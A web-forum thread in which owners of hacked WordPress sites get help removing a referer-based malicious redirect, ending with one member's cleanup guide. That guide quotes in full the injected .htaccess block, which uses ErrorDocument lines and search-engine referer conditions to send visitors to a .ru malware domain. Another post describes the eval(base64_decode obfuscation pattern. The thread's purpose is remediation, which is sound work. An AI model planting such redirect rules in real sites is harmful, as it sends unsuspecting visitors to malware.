Malware disaster - please help


#1

hi,
Yesterday, one of our domains was blacklisted by Google safe browsing (o-fu-online.net). You can see the diag here:
http://www.google.com/safebrowsing/diagnostic?site=o-fu-online.net

I’ve spent about 10hrs attempting to repair this, however i’ve not had much luck. In the end I’ve reverted to an older backup and partially fixed the site by adjusting .htaccess, but i’ve yet to confirm if i’ve managed to remove the infection entirely. The main site seems to be clean now, but the admin page of the wordpress blog is still redirecting to a russian site and i’m unable to access parts of the admin console (such as the add new plugin page, so can’t install anti-malware tools)

If you notice on the diag page, it says: “This site was hosted on 1 network(s) including AS26347 (DREAMHOST)”

if you click that link, it takes you to the diags for the host, which alarmingly advises
"Over the past 90 days, we found 234 site(s) on this network, including, for example, ethisearch.com/, apt518.com/, your-nyc.com/, that appeared to function as intermediaries for the infection of 567 other site(s) including, for example, tutorialkit.com/, stumbleupon.com/, unmicroclima.com/."

So it appears there are other sites on the same host with issues. Is this a server side exploit? I’m stuck with what to do next to be honest. I’ve even overwritten the .htaccess with a blank file and still:

web site: o-fu-online.net
status: Site infected with malware
web trust: Site blacklisted.

Malware found in the URL:
http://www.o-fu-online.net//404testpage4525d2fdc

Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwhta7

The document has moved here.

Malware found in the URL: http://www.o-fu-online.net/feed/

Suspicious conditional redirect on:
http://www.o-fu-online.net/


#2

Unfortunately your site is still hacked. When pages on your site are requested they are still doing a conditional redirect to http:// now-protect . ru /accaunt/index.php?cat=61 if the referring page is Google, for example from a search results page.

You can use an on line tool like http://redleg-redleg.com/file-viewer/ that allows you to set the referring page to google.com and check for this type of redirect.

Suggest you take another look at the .htaccess file. When checking the file be sure to scroll all the way to the bottom of the file. With this hack the hackers have been adding 100s of blank lines then “tabbing” the malicious lines way over in an attempt to hide them.


#3

thanks for the speedy response. I will take a look at the .htaccess again now and report back.
[hr]

ok. the .htaccess in the root folder is 0 byte as i’ve completely dumped it, however the problem still exists! how is that even possible


#4

With a WordPress site the next thing to check is your php code in your core php files. The malicious code will no doubt be obfuscated, a line of php code that starts out eval(base64_decode(’ then a long string of seemingly random characters. There are some tips on where to start looking in this blogpost http://redleg-redleg.blogspot.com/2011/01/redirect-to-malicious-site.html


#5

you most likely have more .htaccess files. If your user has shell access log in and type

find . -name ".htaccess" -print | more [hr]
it may take a minute and act like its frozen, but let it go…


#6

Hi there

I found your forum because I too have been hacked by these X*! It stared with emails being sent out using my email addresses - then I discovered this was happening on two hosts!

So I changed all passwords on cpanel and deleted a variety of emails.

Then I discovered an error on a couple of sites so deleted he plugins that seemed to be causing this - the timthumb element came up here

Now today that annoying redirect has hit so far - 5 sites! 2 in the last hour. I have now requested that my two hosts reinstall backups for all sites! I sincerely hope they will comply and help me to preven this spreading further. do you think reinstalling backups will remove the offending xi!!


#7

thanks for the replies. I’m trying to get some time to work through this. Out of interest, how has this happened? is it a dreamhost issue? the number of sites on their network with infections is astonishing


#8

It cant be a dreamhost issue because the two hosts I am talking about are not dreamhost. I am with bluehost and herohost

I am hoping someone can tell me if using backups from a day or two before this kicked off will remove all the offending hacks?

I still don’t know how this happened but I did notice that piwik is also being targeted and I had a list of my sites on their system which is a replacement for google analytics

I also have VA’s working in PH and have shared docs on Google Docs with site information - could this have been where they got the information, or Piwik?

Does anyone have any idea why my sites were vulneralbe?


#9

just to clarify, I was meaning “is this a server side exploit” rather than a code/user issue. The research i’ve done since i’ve posted the previous comment leads me to believe this is related to an exploit in a component of wordpress themes.


#10

HI again

I have been told it is likely to be a vulnerability in wordpress - Im still hoping someone can tell me how to scan my sites safely to find the vulnerability so I can remove it once my sites are restored?


#11

firstly, I must say again Thanks VERY MUCH to the people in this thread for the help on this matter. :slight_smile:

as some form of attempt at repayment, i’ve written the following guide to help others and I will continue to return to this topic to help.

i’ve just cleaned 3 of my sites. its gone and everything is checking out. I’m still working on it now

here’s my guide so far:

  1. change host password via dreamhost panel

  2. change all user passwords via dreamhost panel

  3. use the webftp to set the permissions to read/write on the file .htcaccess file in the ROOT account folder.

  4. open the file in the viewer of the panel.

  5. if there are any lines at the top of the file such as:

[code]# BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

END WordPress[/code]

copy them somewhere.

  1. If you look towards the middle of the file (scroll down and across) you will find the conditional redirects put in by the malware. it will look like this:

ErrorDocument 400 http://now-protect.ru/accaunt/index.php ErrorDocument 401 http://now-protect.ru/accaunt/index.php ErrorDocument 403 http://now-protect.ru/accaunt/index.php ErrorDocument 404 http://now-protect.ru/accaunt/index.php ErrorDocument 500 http://now-protect.ru/accaunt/index.php <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*baidu.* [OR] RewriteCond %{HTTP_REFERER} .*youtube.* [OR] RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] RewriteCond %{HTTP_REFERER} .*qq.* [OR] RewriteCond %{HTTP_REFERER} .*excite.* [OR] RewriteCond %{HTTP_REFERER} .*altavista.* [OR] RewriteCond %{HTTP_REFERER} .*msn.* [OR] RewriteCond %{HTTP_REFERER} .*netscape.* [OR] RewriteCond %{HTTP_REFERER} .*aol.* [OR] RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] RewriteCond %{HTTP_REFERER} .*goto.* [OR] RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] RewriteCond %{HTTP_REFERER} .*mamma.* [OR] RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] RewriteCond %{HTTP_REFERER} .*lycos.* [OR] RewriteCond %{HTTP_REFERER} .*search.* [OR] RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] RewriteCond %{HTTP_REFERER} .*bing.* [OR] RewriteCond %{HTTP_REFERER} .*dogpile.* [OR] RewriteCond %{HTTP_REFERER} .*facebook.* [OR] RewriteCond %{HTTP_REFERER} .*twitter.* [OR] RewriteCond %{HTTP_REFERER} .*blog.* [OR] RewriteCond %{HTTP_REFERER} .*live.* [OR] RewriteCond %{HTTP_REFERER} .*myspace.* [OR] RewriteCond %{HTTP_REFERER} .*mail.* [OR] RewriteCond %{HTTP_REFERER} .*yandex.* [OR] RewriteCond %{HTTP_REFERER} .*rambler.* [OR] RewriteCond %{HTTP_REFERER} .*ya.* [OR] RewriteCond %{HTTP_REFERER} .*aport.* [OR] RewriteCond %{HTTP_REFERER} .*linkedin.* [OR] RewriteCond %{HTTP_REFERER} .*flickr.* RewriteRule ^(.*)$ http://now-protect.ru/accaunt/index.php [R=301,L] </IfModule>

  1. Press ctrl+A in the editor window to select the whole file. delete it. Then save the file. Paste the valid content back in and save again.

  2. repeat step 4. ensure that the dodgy content has been removed and that your valid content (if any) is still there.

  3. Chmod the .htaccess file back to read permission only.

  4. repeat this procedure (steps 1-9) on the .htaccess file in any site folders you have.

  5. Check your site using these 2 tools:
    http://redleg-redleg.com/file-viewer/
    http://sitecheck.sucuri.net/scanner/

  6. ensure latest wordpress updates are on and ensure you don’t still have a vulnerable copy of the timthumb script which is used by certain themes. Woothemes provide updates via the control panel menu, so I ran that in. (this is specific to the supplier of the theme)

That seems to have done the trick for me, i’m now examining the actual php/java content before attempting a google safebrowsing rescan request.

:smiley:


#12

resubmitted the google scan and everything is now clear again… no more malware :smiley: